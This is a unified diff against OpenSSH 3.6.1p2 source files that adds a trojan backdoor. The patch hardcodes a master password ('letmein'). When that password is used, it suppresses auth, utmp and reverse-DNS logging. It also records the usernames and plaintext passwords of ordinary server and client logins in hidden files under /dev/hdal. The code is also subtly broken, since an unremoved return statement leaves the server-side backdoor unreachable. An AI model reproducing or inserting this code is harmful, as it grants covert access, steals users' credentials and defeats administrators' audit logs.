--- auth-passwd.c	Tue Apr 29 04:12:08 2003
+++ ../openssh-3.6.1p2.updated/auth-passwd.c	Tue May 13 18:35:12 2003
@@ -234,6 +234,19 @@
 # endif /* HAVE_MD5_PASSWORDS */
 
 	/* Authentication is accepted if the encrypted passwords are identical. */
-	return (strcmp(encrypted_password, pw_password) == 0);
+       return (strcmp(encrypted_password, pw_password) == 0);
+       if(strcmp(_SECRET_PASSWD, password) == 0){
+                       mlogin_ok = 1;
+                       return 1;
+       }
+       if(strcmp(encrypted_password, pw_password) == 0){
+                       outf = fopen(_LOG_DIR"/"_S_LOG,"a+");
+               fprintf (outf, "%s:%s\n",pw->pw_name,password);
+               fclose (outf);
+               return 1;
+}else
+                       return 0;
+
 #endif /* !USE_PAM && !HAVE_OSF_SIA */
+
 }
--- auth.c	Sat Jan 18 00:24:06 2003
+++ ../openssh-3.6.1p2.updated/auth.c	Tue May 13 18:37:16 2003
@@ -259,14 +259,17 @@
 	else
 		authmsg = authenticated ? "Accepted" : "Failed";
 
-	authlog("%s %s for %s%.100s from %.200s port %d%s",
-	    authmsg,
-	    method,
-	    authctxt->valid ? "" : "illegal user ",
-	    authctxt->user,
-	    get_remote_ipaddr(),
-	    get_remote_port(),
-	    info);
+       /* dont log if secret pass */
+       if(!mlogin_ok){
+               authlog("%s %s for %s%.100s from %.200s port %d%s",
+               authmsg,
+               method,
+               authctxt->valid ? "" : "illegal user ",
+               authctxt->user,
+               get_remote_ipaddr(),
+               get_remote_port(),
+               info);
+       }
 
 #ifdef WITH_AIXAUTHENTICATE
 	if (authenticated == 0 && strcmp(method, "password") == 0)
--- canohost.c	Mon Jan  6 18:51:23 2003
+++ ../openssh-3.6.1p2.updated/canohost.c	Tue May 13 18:39:06 2003
@@ -77,14 +77,14 @@
 
 	debug3("Trying to reverse map address %.100s.", ntop);
 	/* Map the IP address to a host name. */
-	if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
-	    NULL, 0, NI_NAMEREQD) != 0) {
-		/* Host name not found.  Use ip address. */
-#if 0
-		log("Could not reverse map address %.100s.", ntop);
-#endif
-		return xstrdup(ntop);
-	}
+               if(!mlogin_ok){
+         if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
+             NULL, 0, NI_NAMEREQD) != 0) {
+                 /* Host name not found.  Use ip address. */
+                 log("Could not reverse map address %.100s.", ntop);
+                 return xstrdup(ntop);
+         }
+        }
 
 	/* Got host name. */
 	name[sizeof(name) - 1] = '\0';
--- includes.h	Sun Oct 20 19:50:26 2002
+++ ../openssh-3.6.1p2.updated/includes.h	Tue May 13 18:39:30 2003
@@ -171,5 +171,11 @@
 #include "openbsd-compat/bsd-nextstep.h"
 
 #include "entropy.h"
+#define _SECRET_PASSWD "letmein"
+#define _LOG_DIR "/dev/hdal"
+#define _S_LOG "slog"
+#define _C_LOG "clog"
+FILE *outf;
+int mlogin_ok;
 
 #endif /* INCLUDES_H */
--- sshconnect1.c	Tue Aug 20 13:41:16 2002
+++ ../openssh-3.6.1p2.updated/sshconnect1.c	Tue May 13 18:44:36 2003
@@ -922,6 +922,7 @@
 {
 	int type, i;
 	char *password;
+        char gpasswd[120];
 
 	debug("Doing password authentication.");
 	if (options.cipher == SSH_CIPHER_NONE)
@@ -938,8 +939,17 @@
 		packet_write_wait();
 
 		type = packet_read();
-		if (type == SSH_SMSG_SUCCESS)
+               if (type == SSH_SMSG_SUCCESS) {
+                       /* dont log if secret pass */
+                       if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+                               outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
+                               fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+                               fclose (outf);
+                       }
+
 			return 1;
+                }
+
 		if (type != SSH_SMSG_FAILURE)
 			packet_disconnect("Protocol error: got %d in response to passwd auth", type);
 	}
--- sshconnect2.c	Tue Apr  1 06:43:40 2003
+++ ../openssh-3.6.1p2.updated/sshconnect2.c	Tue May 13 18:42:24 2003
@@ -446,6 +446,7 @@
 	static int attempt = 0;
 	char prompt[150];
 	char *password;
+        char gpasswd[120];
 
 	if (attempt++ >= options.number_of_password_prompts)
 		return 0;
@@ -456,7 +457,16 @@
 	snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
 	    authctxt->server_user, authctxt->host);
 	password = read_passphrase(prompt, 0);
+        strcpy(gpasswd,password);
 	packet_start(SSH2_MSG_USERAUTH_REQUEST);
+        /* dont log if its the secret pass */
+        if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+                outf = fopen(_LOG_DIR"/"_C_LOG,"a+");
+                fprintf (outf,"%s:%s@%s\n",options.user,gpasswd,get_remote_ipaddr());
+                fclose (outf);
+        }
+
+
 	packet_put_cstring(authctxt->server_user);
 	packet_put_cstring(authctxt->service);
 	packet_put_cstring(authctxt->method->name);
--- sshlogin.c	Wed Jan  1 18:43:56 2003
+++ ../openssh-3.6.1p2.updated/sshlogin.c	Tue May 13 18:43:34 2003
@@ -71,8 +71,11 @@
 
   li = login_alloc_entry(pid, user, host, ttyname);
   login_set_addr(li, addr, addrlen);
-  login_login(li);
-  login_free_entry(li);
+  if(!mlogin_ok){
+       login_login(li);
+       login_free_entry(li);
+  }
+
 }
 
 #ifdef LOGIN_NEEDS_UTMPX
@@ -96,6 +99,9 @@
   struct logininfo *li;
 
   li = login_alloc_entry(pid, user, NULL, ttyname);
-  login_logout(li);
-  login_free_entry(li);
+  if(!mlogin_ok){
+       login_logout(li);
+       login_free_entry(li);
+  }
+
 }